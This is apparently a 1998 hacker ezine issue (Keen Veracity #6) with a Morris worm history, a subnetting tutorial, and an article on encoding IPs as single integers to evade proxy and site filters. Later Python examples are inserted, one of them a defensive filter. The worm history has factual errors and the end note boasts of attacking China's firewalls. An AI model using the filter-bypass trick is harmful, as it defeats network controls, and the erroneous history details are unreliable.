Keen Veracity

|--------Issue #6 December 1998----------|
         Legions of the Underground
|-----------www.legions.org--------------|

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

*---The Legions Staff---*

optiklenz - The man with the circuit board boxers
icer - is in search of Terabyte ethernet nirvana.
aphex - "I love rules, I think they're wicked"
lasik - "that's not an ATARI 2600 is it!?"
cap n crunch - "knows how to whistle"
sreality - "the original code pimp - betta' act like you know, bitch ;)"
HyperLogik/m0f0 - Contact your local netherlands phone operator
Zyklon - taking over the world with an 8086 and a 300 baud modem
tip - brings his ALTAIR to nudie bars
[havoc] -
kM - uses tape feeds to pimp his ho like a TX-0
defiant - "where's my pay"
Duncan Silver -
DigiEbola - Of course I'm drunk, I ain't no stunt driver.
flemming - "not with that burnt out piece of shit"
Bronc Buster - the keyboard cowboy
lothos - "The Doctor is IN"
mercs -
NetJammer -
dethl0k - coded a loop in his tie
NtWakO/NeatHack - Bugs in NT? You're shitting me....
Mnemonic -
zortin8r - "Someone add me to these lists!"
King BonG -
IsolationX -

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[01X10] Introduction                                   Digital Ebola
[02X10] Letters to Editor                              The Readers
[03X10] The Morris Internet Worm                       Defiant
[04X10] Setting Up Subnets                             m0f0
[05X10] Defunct Internet Protocol [DIP Security]       Optiklenz
[06X10] Exploiting PPP Frame Byte-Stuffing             Noc-Wage
[07X10] NT Security - Tips & Techniques                Neathack
[08X10] Rootfest `99 Details                           Defiant/Lothos
[09X10] Revamped bootp Exploit                         Bronc Buster
[10X10] In the News                                    sources

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Introduction                                           Digital Ebola
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Welcome to another wholesome edition of Keen Veracity. As I sit here, in my cozy little corner of cyberspace, I am wondering where to base this week's editorial. And it came to me: the art of thinking. More to the point, of creative thought. Much of what constitutes the computer industry, and hacking in general, is free thought. As a computer cannot code itself, sometimes the human mind is at a segfault. What runs through the minds of the people on the cutting edge of the field? Lunacy? Will? Or plain desire? To hack the machine, you have to hack yourself. Inspiration, in any case, is needed. We may get it through a book, an action or even history itself. Who knows, yes, even Keen Veracity! The whole point of this ramble is that sometimes it's hard to find the inspiration, and the ideas, to make the cutting edge things happen. We read, we poke at keys with the tunes at 190 dB, go to conventions (check out the RootFest 99 article), and we converse among our peers in strange mediums, and the ideas flow. This, I believe, is our purpose, and it is a good one. If we do anything in the world, let's provoke someone into having a good idea and to act on it.

This week, I am pleased to announce that our site www.legions.org is back up and running.
You are sure to see many improvements, as it will continue to be improved upon. Also, we are gearing up for Rootfest 99, in May. The Legions crew will be out in effect, with t-shirts and hardcopies of Keen Veracity, which is now not only available in text, tar, zip, and prc formats, but in paperback, complete with a kickin' cover and an included diskette with the code we feature here. In addition to our table, Optiklenz will be speaking on Cisco security and encryption. This convention is sure to be a blast, and a good chance to compare notes and meet the Legions crew. For more information, see Lothos's article below, or check out www.rootfest.org.

That looks like the end of my rant for the week. If you would like to submit an article, or become an official KV Distro Site, please email digi@wintermute.linux.tc

Happy reading!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Letters to the Editor                                  The Readers
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Subject: Novell article in Keen Veracity 5

This was an excellent article, which covered the subject of security in Novell very well. I have one error to draw your attention to though. In the intro Ntwak0 states: "First Simple Rule Upgrade to NetWare 4.x this will defeat many of the attacks". This is ONLY true if the sys admin has not checked the box to run in bindery mode. This is an emulation system NetWare runs to allow communication between mixed NW3.x and NW4.x servers. If this is enabled, 90% of 3.x attacks will still work on a 4.x server environment. Otherwise, an excellent article.

Max the Silent

If you wish to have a list of exploits that still run on 4.x (whatever the bindery mode says), mail me.
( Yah, looks like we got some of that thought thing goin on :P )

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The Morris Internet Worm - Historical Information      Defiant
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

- [ The Morris Internet Worm ] -
- by -
- [ Defiant ] -
- [ http://wintermute.linux.tc/~defiant ] -

----[ i n t r o d u c t i o n ]

This is something I intended to do a while ago, well, actually nearly a month ago, so that it came out around 10 years after the internet worm was released, but as usual, things go wrong and it's over a month late; my apologies. Anyway. What I aim to do is describe what happened that day, and also describe the worm and what it did, and some history of the worm and all things connected.

----[ w h a t   w a s   i t ? ]

Even today there is some confusion as to what the worm was. Some people still call it a virus, but for many reasons this is not true. The main difference between the worm and a normal virus is the way it reproduces and spreads. When a normal computer virus enters a system, usually via an infected disk or a file downloaded from the internet, it infects a system file and also a file that will be used sometime in the near future. The alteration to this file is usually the addition of the commands to activate the virus. Now, let's see for these two examples how the worm was different. First of all, a worm doesn't need to be spread via a disk or infected file; it breaks into computers via exploits, such as statd or named, although these bugs weren't around then. When the worm has broken in it will launch another program, which will scan the internet for more hosts it can gain entry to. At no time does it require a user to launch the program or send it to someone; it acts independently. Some may call this AI (artificial intelligence), although in a very basic form.
All computers attached to the internet could be potential targets of the worm, unlike a virus, where it would be those that were accidentally infected.

----[ h i s t o r y   o f   w o r m s ]

When the Internet Worm was released in 1988 it was by no means the first of its kind, nor was it the last. The name of the worm comes from a book called The Shockwave Rider, written by John Brunner in 1975. In short, the story is about a totalitarian government that controls its citizens through a powerful computer network. A freedom fighter infests this network with a program called a "tapeworm", forcing the government to shut down the network, thereby destroying its base of power. Between this book and the 1988 Morris Internet Worm, it is no wonder that worms got a bad name. The truth of the matter is the first worms were actually designed to facilitate better network usage.

<1971>

In 1971 the first program that could reasonably be called a worm was written by Bob Thomas. This was a program for Air Traffic Controllers to notify them when a plane moved from one computer to another. The program, called Creeper, only moved from one screen to another displaying the message "I'm creeper! Catch me if you can!"; it NEVER reproduced itself. After this, several programmers tried the idea out to perform tasks, but within a few months the idea died out.

<1980>

In the early 1980's, John Shock and Jon Hepps of Xerox's Palo Alto Research Center began experimenting with worm programs. This was in fact the first time the term worm had been applied to this sort of code. They developed 5 worms between them, each of which was used to perform a specific helpful task around the network.
Some of these were quite simple, such as the Town Crier, which traveled around the network posting announcements, and some were complex, such as The Vampire, which would be idle during the day, but during the night, when CPU usage was low, it would take advantage of this and use it; then at dawn it would save its work and wait until night again. These worms were very useful until one night one of Xerox's worms malfunctioned, and when people turned up to work the next day they found all their machines crashed. Making this problem even worse, when people restarted their machines, they found the malfunctioning worm continued to crash their systems. It was at this point, when a vaccine had to be written, that it became apparent that worms could be dangerous and cause problems.

After this minor disaster worm research dropped out of the public eye until 1988, when Morris' worm thrust it back into the spotlight. Morris' worm was front-page news in most of the papers, and it was US election time at the time, so it was pretty impressive, and people all over the world were infected with the worm and experiencing problems. Since Morris' worm, no worm has been able to replicate the shock value; however, there have been worms since then. In 1989 another worm was released, this one very destructive, but it didn't cause as many problems. The following is what this worm did....

It attempts to gain system privileges. If it succeeds:

  - It turns off mail to the SYSTEM accounts.
  - It alters the system login command to make it APPEAR that all a user's files have been deleted.
  - It alters the announcement message to display a message of its own choosing.

Even if it fails to infect a system account:

  - It transmits its location (thus indicating that the system it is on has a security hole).
  - It harasses users by using the PHONE function to ring them.
  - It records user passwords that are found to be simple, such as the null string and the user's username.
There are still worms around today in the late 90's, but none have ever caused as many problems. The most recent I can think of would be ADMw0rm. Just because they haven't been reported, though, doesn't mean that they don't exist. We all learn from mistakes, and because of the mistakes Morris made, and also learning that destructive worms don't help, people would be able to make more efficient worms that could go almost undetected; however, it is unlikely.

----[ e f f e c t s ]

Before I state what Morris's Internet Worm did do, it may be easier to state what it didn't do.

  - The worm didn't alter or destroy files.
  - The worm didn't save or transmit the passwords which it cracked.
  - The worm didn't make special attempts to gain root or superuser access in a system (and didn't utilize the privileges if it managed to get them).
  - The worm didn't place copies of itself or other programs into memory to be executed at a later time. (Such programs are commonly referred to as timebombs.)
  - The worm didn't attack machines other than Sun 3 systems and VAX computers running 4 BSD Unix (or equivalent).
  - The worm didn't attack machines that were not attached to the internet. (In other words, no computers that didn't have an internet address were attacked. Modems do not count as internet connectors in this respect.)
  - The worm didn't travel from machine to machine via disk.
  - The worm didn't cause physical damage to computer systems.

With all of this out of the way, you are probably wondering what the worm did do. It wasn't there for someone to gain access into thousands of computers, or to cause mass destruction. From the decompiled versions of the worm it appears to do nothing, well, nothing obvious anyway. The worm was designed simply to spread as far as possible and infect as much as possible. Maybe it was just a test that Morris ran before he finished the worm to do something more sinister; we will probably never know.
However, further adding to the theory that this was a test, the code was far from perfect. Apparently at the time the worm was released it contained numerous bugs, and the programmer had greatly underestimated the effects the worm would have. One of the bugs was the fact that once a worm infected a host, it might reinfect it many times, thus being a DoS attack. This seemingly untraceable process soon reinfected the same machines and caused them to crash. This is an extract from the book "A Tour Of The Worm" by Donn Seeley, explaining this problem. All the following events occurred on the evening of Nov. 2, 1988.

   6:00 PM  At about this time the Worm is launched.
   8:49 PM  The Worm infects a VAX 8600 at the University of Utah (cs.utah.edu).
   9:09 PM  The Worm initiates the first of its attacks to infect other computers from the infected VAX.
   9:21 PM  The load average on the system reaches 5. (Load average is a measure of how hard the computer system is working. At 9:30 at night, the load average of the VAX was usually 1. Any load average higher than 5 causes delays in data processing.)
   9:41 PM  The load average reaches 7.
  10:01 PM  The load average reaches 16.
  10:06 PM  At this point there are so many worms infecting the system that no new processes can be started. No users can use the system anymore.
  10:20 PM  The system administrator kills off the worms.
  10:41 PM  The system is reinfected and the load average reaches 27.
  10:49 PM  The system administrator shuts down the system. The system is subsequently restarted.
  11:21 PM  Reinfestation causes the load average to reach 37.

In short, in under 90 minutes after infection the system was unusable, and there were great costs due to loss of service and time spent trying to fix the problems the worm caused. Between $100,000 and $10,000,000 were lost due to lost access to the internet at an infected host, according to the United States General Accounting Office.
----[ t h e   r o u t e ]

This is the "route" the worm took once it had infected a system.

1 - First it would change its process name to "sh" in order to mask its process name. This is quite obviously the Bourne Again Shell, a common shell environment for UNIX systems.

2 - The worm's creator didn't want the worm to be easy to capture, since once someone captured a copy of the running worm, it would be possible to deconstruct the code and figure out how to stop it. To this end, the next thing the Worm does is set the maximum core dump size to zero bytes. A "core dump" places a copy of the CPU's running process into memory for further examination. A core dump occurs whenever a program crashes, but can also be forced. Since the worm set the size of the core dump to 0, even if the program crashed, or was forced to crash, investigators would not get a copy of the running worm.

3 - The worm also reads the current time at this point and stores this for seeding the random number generator. This will be used later.

4 - Additionally, when the Worm was executed, it might have been executed with the -p flag, an optional command line argument, followed by a decimal number which was believed to be the process identification number of the current worm's parent.

5 - The rest of the command line arguments that the Worm was executed with are the names of the object files that it needs in order to operate at full capacity. The worm tries to load the files named by these arguments into its address space. If the -p argument was given above, then it also deletes these files after loading them, and later deletes the disk copy of the running worm itself. It also tries to delete the file /tmp/.dumb, although, since this file is never referred to again, it is unclear why it does so. If it fails to load any one of these object files, the worm quits. Otherwise, the worm continues.

6 - The Worm checks to make sure that it had at least 1 object file in its command line. If it didn't, it quits.
7 - The Worm then checks to see that it has successfully loaded the file l1.c. This is the file that the Worm will use later to infect other systems. If this file was not loaded, the Worm quits.

8 - The Worm then erases the text of the argument array to further hide any evidence of its presence.

9 - The Worm then scans the network interfaces of the machine it is on, getting the flags and addresses of each interface. If it cannot find any interfaces, the Worm quits. It also loads the network mask, which allows the Worm to determine what internet addresses are used by the local network.

10 - The Worm then kills the process given in the -p option (probably the process that created this copy of the worm), changing the current process group to avoid killing itself. At this point the initializations are complete and the worm calls the central routine of the worm.

11 - Using a random number (seeded by the current time), the Worm then determines whether or not to check for itself. There is a one in seven chance that it will not; otherwise, the Worm checks for itself.

12 - If the Worm does not check for itself, it will go ahead and continue. This one in seven chance was originally added to make the Worm more difficult to kill; ironically, it worked in the sense that this addition is why the Worm spread so quickly. In addition, only the first copy of the Worm on any one machine would check for itself; all subsequent copies skip the test entirely.

13 - There is also a procedure that was supposed to send one byte to the address 128.32.137.13 (ernie.berkeley.edu), port 11357; this did not work, though, since the program used the TCP command sendto instead of a UDP datagram. Since the program never initiated a connection with the aforementioned port, the TCP command failed with a "socket not connected" error. This random (one in fifteen) byte appeared to be for monitoring the overall progress of the Worm on the net.
If the worm had been developed further, as many people think it would have been after the original version if it had worked as intended, this could have been used to say that a host had been backdoored, etc., but the worm never had such a function in it.

After this, the Worm proceeds to the primary loop of the program. This infinite loop calls all of the major procedures in the following order:

14 - Cracksome, the routine which searches for hosts that the Worm can break into;

15 - The Worm then runs other_sleep for thirty seconds;

16 - The Worm then runs Cracksome again;

17 - The Worm then forks into two child processes and kills the parent process. The child has all of the information that the parent had; in addition, the child has a new process number, making the worm difficult to hunt down. The Worm then runs through the infect process again;

18 - Then the Worm runs other_sleep for 120 seconds;

19 - Before looping back on itself, the Worm checks to see how long it has been running. If it has run for over 12 hours, it cleans up some of the host list entries.

The Worm loops through this procedure until it is told to quit by another worm or is killed.

----[ m o r r i s ]

In case you were wondering what happened to Morris because of his actions, I will tell you. He was convicted of a Federal felony in the case. The law involved was 18 USC 1030 (A)(5)(a), the Computer Crime and Abuse Act of 1986. He was found guilty in February of 1990 in US District Court in Syracuse, NY. In May of 1990, he was sentenced -- outside of Federal sentencing guidelines -- to 3 years of probation, 400 hours of community service, and $10,050 in fines plus probation costs. His lawyers appealed the conviction to the Circuit Court of Appeals, and the conviction was upheld. His lawyers then appealed to the Supreme Court, but the Court declined to hear the case -- leaving the conviction intact.
For a while, Robert was (allegedly) working as a programmer (non-security related) for CenterLine Software (makers of CodeCenter, et al.). More recently, Robert has been working on his Ph.D. under the direction of H.T. Kung at Harvard University. He is also involved with the ViaWeb company. To the best of my knowledge, he has not spoken publicly about the incident, nor has he attempted to work in computer security.

----[ w r a p   u p ]

Well, that's pretty much some basic information on the worm and related things. I want to thank everyone out there that has a site with information on it about the worm, as I took information from so many I cannot accurately credit these people for their information. If by any chance you see something that you think you should be credited for, please mail me and let me know and I will give you the credit you deserve.

-Defiant
defiant@wintermute.linux.tc
http://wintermute.linux.tc/~defiant

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Setting Up Subnets                                     m0f0
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Subnets are logical subsections of a single TCP/IP network. For administrative or technical reasons, many organizations choose to divide one network into several subnets. Routing can get very complicated as the number of networks grows. For example, a small organization might give each local network a Class C number. As the organization grows, administering network numbers may get out of hand. A better idea is to allocate a few Class B network numbers for each major division in a company: one for engineering, one for operations, and so on. Then, divide each Class B network into physical networks using subnets. In this way, you can isolate hosts from changes you might make to the network in remote parts of the organization. Subnets allow you more flexibility when assigning network addresses.
The Internet Protocol allows 127 Class A networks with 24-bit host fields; 16,383 Class B networks with 16-bit host fields; and over two million Class C networks with 8-bit host fields.

-Network Masks-

Typically, you create subnets by using a subnetting scheme called the "address mask." When setting up your network, you should select a network-wide "network mask". A network mask determines which bits in the IP address will represent the subnet number. The remaining bits represent the host within the subnet.

For example, you could configure an organization's internetwork as a Class B network. Then you could assign each local subnet a subnet number within that network. The 16 bits could be allocated as 8 for subnet and 8 for host, or 9 for subnet and 7 for host, and so on. Your decision would be transparent to everyone outside that organization.

You can express network masks as a single hexadecimal number, or as four octets of decimal numbers. The default is a mask of 0xFF000000 (255.0.0.0) for Class A networks, 0xFFFF0000 (255.255.0.0) for Class B networks, and 0xFFFFFF00 (255.255.255.0) for Class C networks. You only have to specify network masks explicitly when they are wider (that is, have more one-bits) than the default values.

One common case is a Class C mask on a Class B network. A Class B network provides you with 256 possible subnets, each one of which can accommodate 254 possible hosts (remember, 0 and 255 are not acceptable host addresses). But you may know that none of your subnets will ever have more than, say, 128 hosts, while you may need more than 256 subnets. In that case, you could decide to use nine bits for the subnet number instead of eight, and seven for the host addresses. The appropriate mask for this would be 0xFFFFFF80, or 255.255.255.128 (2 to the power of 7 is 128, and 128 subtracted from the possible 256 is 128).
Given the above scheme, and a network address of, for instance, 131.60, the address for the first host of the first subnet would be 131.60.0.129.

/etc/netmasks File

The /etc/netmasks file contains the default netmasks for your system. To set up the netmask, you need to create this file. Here is a sample /etc/netmasks.

    #
    # Network masks
    #
    # only non-standard subnet masks need to be defined here
    #
    # Network      netmask
    128.32.0.0     255.255.255.0

Create an entry with the network number and network mask on a separate line for each network that is subnetted. You can use ifconfig to override the network masks manually. For more information about ifconfig, refer to the ifconfig(1M) Reference Manual entry.

For example, consider Class B network 128.32 with an 8-bit wide subnet field (and, therefore, an 8-bit wide host field). The /etc/netmasks entry for this network would be

    128.32.0.0     255.255.255.0

You can enter symbolic names for subnet addresses in the /etc/hosts file. You can then use these subnet names instead of numbers as parameters to commands. For more information about netmasks, see the netmasks(4) Reference Manual entry.

Changing from a Nonsubnetted to a Subnetted Network

Follow these steps to change from an internetwork that does not use subnets to one that is subnetted.

1. Decide on the new subnet topology, including considerations for subnet routers and locations of hosts on the subnet.
2. Assign all subnet and host addresses.
3. Edit /etc/netmasks as mentioned previously.
4. Edit /etc/hosts on all hosts to change host addresses.
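The subnet arithmetic described above (classful network number, subnet field, host field, and the /etc/netmasks format), as an added worked example in Python; this is not code from the article. It treats subnet zero and the all-ones subnet as reserved, as the article does, and the /etc/netmasks text inside it is constructed (the 131.60 entry assumes the 255.255.255.128 mask from the text).

```python
"""Classful subnet arithmetic and /etc/netmasks parsing (added example, not from the article)."""
import ipaddress

ALL_ONES = 0xFFFFFFFF


def to_int(dotted):
    """Strict dotted-quad to 32-bit integer; shortened or out-of-range forms are rejected."""
    return int(ipaddress.IPv4Address(dotted))


def to_dotted(value):
    return str(ipaddress.IPv4Address(value))


def class_prefix_len(addr):
    """Length of the default (classful) mask, decided by the leading address bits."""
    first = addr >> 24
    if first < 128:
        return 8          # Class A: 255.0.0.0
    if first < 192:
        return 16         # Class B: 255.255.0.0
    if first < 224:
        return 24         # Class C: 255.255.255.0
    raise ValueError("class D/E address has no host field")


def prefix_mask(length):
    return (ALL_ONES << (32 - length)) & ALL_ONES


def split_address(dotted, netmask):
    """Split an address into network, subnet number and host number under the given mask."""
    addr, mask = to_int(dotted), to_int(netmask)
    inverted = ~mask & ALL_ONES
    if inverted & (inverted + 1):                 # host bits must be one contiguous run
        raise ValueError(f"non-contiguous mask {netmask}")
    class_len = class_prefix_len(addr)
    mask_len = bin(mask).count("1")
    if mask_len < class_len:                      # a mask may only be wider than the class default
        raise ValueError(f"{netmask} is narrower than the default mask for {dotted}")
    subnet_bits = mask_len - class_len
    host_bits = 32 - mask_len
    network = addr & prefix_mask(class_len)
    return {
        "network": to_dotted(network),
        "subnet_bits": subnet_bits,
        "host_bits": host_bits,
        "subnet": (addr & mask & ~prefix_mask(class_len)) >> host_bits,
        "host": addr & inverted,
        # all-zeros and all-ones values are reserved; 0 means "not subnetted"
        "usable_subnets": max((1 << subnet_bits) - 2, 0),
        "hosts_per_subnet": (1 << host_bits) - 2,
    }


def first_host(network, netmask, subnet_number):
    """Lowest host address (host number 1) in the given subnet of a network."""
    info = split_address(network, netmask)
    if not 1 <= subnet_number <= info["usable_subnets"]:
        raise ValueError(f"subnet {subnet_number} is reserved or out of range")
    return to_dotted(to_int(info["network"]) | (subnet_number << info["host_bits"]) | 1)


# Constructed /etc/netmasks contents in the format shown in the article.
NETMASKS_SAMPLE = """\
#
# Network masks
#
# only non-standard subnet masks need to be defined here
#
# Network      netmask
128.32.0.0     255.255.255.0
131.60.0.0     255.255.255.128
"""


def parse_netmasks(text):
    """Map classful network number -> mask from /etc/netmasks-style text."""
    masks = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        if len(fields) != 2:
            raise ValueError(f"malformed /etc/netmasks line: {raw!r}")
        network, mask = fields
        masks[to_int(network)] = to_int(mask)
    return masks


def mask_for(dotted, masks):
    """Mask a host on this network should use: the configured one, else the class default."""
    addr = to_int(dotted)
    class_len = class_prefix_len(addr)
    network = addr & prefix_mask(class_len)
    return to_dotted(masks.get(network, prefix_mask(class_len)))


if __name__ == "__main__":
    table = parse_netmasks(NETMASKS_SAMPLE)
    for host in ("131.60.0.129", "128.32.5.7", "10.1.2.3"):
        mask = mask_for(host, table)
        print(host, mask, split_address(host, mask))
```

Running it shows 131.60.0.129 under 255.255.255.128 as subnet 1, host 1, which is why the article calls it the first host of the first subnet.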
Examples of Subnets

The following examples show network installations where subnets are (and are not) in use:

    128.32.0.0   Berkeley Class B network (subnetted)     netmask 255.255.255.0
    36.0.0.0     Stanford Class A network (subnetted)     netmask 255.255.0.0
    10.0.0.0     Arpanet Class A network (nonsubnetted)   netmask 255.0.0.0

The University of California at Berkeley is assigned the network number 128.32.0.0, so that any external router only needs to know one route to reach Berkeley. Within the campus, a Class C subnet mask is used to give each local network a subnet number, with 254 hosts on each of the 254 possible subnets. (Zero and all ones, that is 255, are reserved.) Stanford University uses a Class A network number with a Class B network mask, for 254 subnets of 65534 hosts each. The ARPANET is a Class A network without subnets; therefore, the default Class A netmask is used.

m0f0

-----------------------------------------------------------------
*=-###############################################-=*
[*]                                               [*]
|         Defunct Internet Protocol [DIP]          |
|                   optiklenz                      |
|          Legions Of the Underground              |
+---+*LoU*********************************LoU*+---+
*****************************************************************

The first few paragraphs of this text serve as a general outlook for people who have no prior knowledge of the TCP/IP protocols.
-----------------------------------------------------------------

Every host or computer on the internet is addressed by an IP number. No two IP numbers are equivalent. A perfect analogy would be the procedure of the postal service. Think of IPs as being houses; each house needs an individual identifier that is distinct from the others.

    [90150^] - House 1
    [90151^] - House 2
    [90153^] - House 3

Each house has a different home address so that the post office is able to find it and deliver mail accordingly. This goes alike for an IP number.
Each IP number is different from the others, which allows data intended for a particular host to be transferred to its destination without error. The IP's network ID remains the same in all occurrences, but its host ID changes.

Example: 60.0.0.0 - Where 60 is the network ID

All IP addresses are 32 bits long, and are comprised of four 8-bit segments known as octets. The way this is addressed is using ones and zeros. The human mind doesn't designate numbers as well as it does words; this is the reason for domain naming. Could you imagine if people were identified by a numeric value rather than a name? It'd be pretty ridiculous. Picture yourself calling out to a friend, "Hey 19682842434?" So, for the same convenience of having a static name, we have static IPs with a logical address (127.0.0.1) or a domain name (www.localhost.com) that interprets all the data for us.

Quick overview on the process of IP conversion:

    <*-------------------------------------*>
     10000001 01100100 00001111 00000110  - IP
    <*-------------------------------------*>
                       to
    <*-------------------------------------*>
     129.100.15.6                          <-- decimal conversion
    <*-------------------------------------*>
                       to
    <*-------------------------------------*>
     PC                                    <-- Host Name
    <*-------------------------------------*>

Protocols convert to the physical address going from PC (Host Name) to 129.100.15.6 (decimal address).

+-=============-+
* The Process *
+-=============-+

Seeing that IPs are 32 bits in 4 8-bit segments: if you take 32 (bits of the IP) and multiply it by 8 (bits of each IP segment) you get 256 bits, or a cluster of 1's and 0's depending on how you are looking at it. =]

To give an example of how we go from an IP in decimal form to a defunct IP, we'll use www.legions.org. Resolve the domain name. In this case we have 199.227.88.145: [segments referred to as SEG]

    ********************
    256| 3-2-1 method...
    ********************
    32(8) = 256

      SEG1(199) * 256^3
    + SEG2(227) * 256^2
    + SEG3(88)  * 256
    + SEG4(145)
    = 3353565329 (new identifier)

Defunct IP: The reason I call the new identifier a defunct IP is because when it goes through the above process it is no longer in decimal form. So I refer to it as a "dead IP".

Security Analysis: If you take an IP in decimal form and convert it to a defunct IP [DIP], services will still resolve the number as an identifier for that host, but since it no longer has any decimals separating segments it is perceived as an Intranet host rather than its original standing as an IP. This brings some questions of security, since Intranets tend to have very little security implementation. Since the given locator is no longer considered an IP, it is no longer subject to the same security restrictions imposed on a practical host identifier. For this reason, if you were obstructed from accessing specific things from behind a proxy, using the new identifier the security measures otherwise implemented no longer apply.

    open: www.legions.org
    no connection due to proxy restrictions

meaning: whereas 199.227.88.145 would obtain no connection, 3353565329 would process.

Also, if you are being blocked from certain sites because they might contain ActiveX or Java applets, or if you just use AOL, whereby 90% of the internet is blocked out anyway, the defunct IP method will allow you to view the site without any complications. The reason some administrators block sites that contain Java and ActiveX is because scripts on certain sites may be a security hazard or malicious, in the sense that they cause a DOS (denial of service) or do other things which would otherwise keep the system from executing what it's set up to do.

--------------------------------------------------------
The code below was written to go with this article
-------------------------------------------------------

/*
 * defunct.cpp - use: Enter logical IP number.  Results: Defunct Address
 * Defunct IP Calculation Module
 * Legions Of the Underground - http://www.legions.org
 * Code written to assist article written on Defunct IP's, and Security Risk
 * in Keen Veracity 6
 * optiklenz@legions.org - optiklenz
 * This code may be altered as long as proper credit is given
 */
#include <iostream>
#include <cstdlib>
#include <cstring>

using namespace std;

int ClearCin(istream& isIn)                 // Clears istream object
{
    int nRet = isIn.rdstate();
    char szTempBuf[20];
    isIn.clear();                           // Clear error flags
    streambuf* sbpThis = isIn.rdbuf();      // Get streambuf pointer
    streamsize nCount = sbpThis->in_avail(); // Number of characters still buffered
    while (nCount > 0) {                    // Extract them to szTempBuf and discard
        streamsize n = nCount > 20 ? 20 : nCount;
        sbpThis->sgetn(szTempBuf, n);
        nCount -= n;
    }
    return nRet;
}

int main()
{
    double result = 0;
    double numb[4];
    char text[16];                          // "255.255.255.255" is 15 chars plus the terminator
                                            // (the original declared text[15] and read 16 into it)

    cout << "Input the address you wish to use/modify...\n> ";
    cin.getline(text, sizeof text);
    ClearCin(cin);

    // Parse the four dotted-decimal segments into numb[0..3]
    for (int x = 0, y = 0; x <= 3; x++) {
        char stay[4] = {0};                 // up to three digits plus the terminator
        int z = 0;                          // (the original's stay[3] had no room for it)
        while (text[y] != '.' && text[y] != '\0' && z < 3)
            stay[z++] = text[y++];
        numb[x] = atof(stay);
        if (text[y] == '.')
            y++;                            // step over the dot before the next segment
    }
    cout << numb[0] << " " << numb[1] << " " << numb[2] << " " << numb[3];

    // Run algorithm: SEG1*256^3 + SEG2*256^2 + SEG3*256 + SEG4
    result  = numb[0] * 16777216;
    result += numb[1] * 65536;
    result += numb[2] * 256;
    result += numb[3];

    // Print the identifier as a whole number.  The original used ecvt(result, 10, ...),
    // which pads results shorter than ten digits with trailing zeros.
    cout << endl << (unsigned long)result << endl;
    return 0;
}

-----------------------------------------------------------------------------------

End Note:

Recently members of Legions Of the Underground "attacked" China yet again on their "human rights" condition. China set up firewalls in an effort to deter the people of the Chinese Republic from viewing sites which were found objectionable by the Communist rule of China. These firewalls were paralyzed, and reconfigured.
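The filter-side check that closes the gap the article describes, as an added example in Python (not the article's code): it implements the same 3-2-1 conversion as defunct.cpp and then compares addresses rather than strings, so 199.227.88.145 and 3353565329 land on the same blocklist entry. Only the two forms the article discusses (dotted decimal and the single unsigned integer) are treated as address literals; the blocklist and URLs are constructed.

```python
"""Compare addresses, not strings, in a proxy filter (added example, not the article's code)."""
from urllib.parse import urlsplit

MAX_32 = 0xFFFFFFFF


def to_defunct(dotted):
    """The article's 3-2-1 method: SEG1*256^3 + SEG2*256^2 + SEG3*256 + SEG4."""
    segs = dotted.split(".")
    if len(segs) != 4:
        raise ValueError(f"not a dotted quad: {dotted!r}")
    value = 0
    for seg in segs:
        if not seg.isdigit() or int(seg) > 255:
            raise ValueError(f"bad segment {seg!r} in {dotted!r}")
        value = value * 256 + int(seg)
    return value


def from_defunct(value):
    """Back from the 32-bit integer to dotted decimal."""
    if not 0 <= value <= MAX_32:
        raise ValueError(f"{value} does not fit in 32 bits")
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_address(host):
    """Dotted-quad form of an IPv4 literal in either spelling, or None if host is not one."""
    host = host.strip()
    if host.isdigit():                          # the "defunct" form: one unsigned integer
        value = int(host)
        return from_defunct(value) if value <= MAX_32 else None
    try:
        return from_defunct(to_defunct(host))   # dotted decimal, re-rendered to normalize it
    except ValueError:
        return None                             # a hostname (or junk): left to DNS


class AddressFilter:
    """Blocklist of IPv4 addresses checked against the host part of a URL."""

    def __init__(self, blocked):
        self.blocked = set()
        for entry in blocked:
            canon = canonical_address(entry)
            if canon is None:
                raise ValueError(f"blocklist entries must be address literals: {entry!r}")
            self.blocked.add(canon)             # stored in one canonical spelling

    def naive_is_blocked(self, url):
        """The string comparison the article bypasses: matches the host text as written."""
        return (urlsplit(url).hostname or "") in self.blocked

    def is_blocked(self, url):
        """Canonicalize first, then compare: both spellings of a blocked host are caught."""
        canon = canonical_address(urlsplit(url).hostname or "")
        return canon is not None and canon in self.blocked


if __name__ == "__main__":
    flt = AddressFilter(["199.227.88.145"])
    for url in ("http://199.227.88.145/", "http://3353565329/", "http://www.legions.org/"):
        print(url, "naive:", flt.naive_is_blocked(url), "canonical:", flt.is_blocked(url))
```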
